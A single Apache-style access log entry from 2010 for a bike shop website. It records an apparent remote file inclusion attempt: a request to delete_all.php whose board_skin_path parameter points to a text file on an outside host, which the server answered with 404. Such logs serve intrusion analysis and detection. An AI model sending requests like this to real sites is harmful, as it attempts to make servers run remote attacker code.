62.44.82.61 - - [11/Jul/2010:13:46:49 -0700] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.sociomed.hu/includes/zd1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
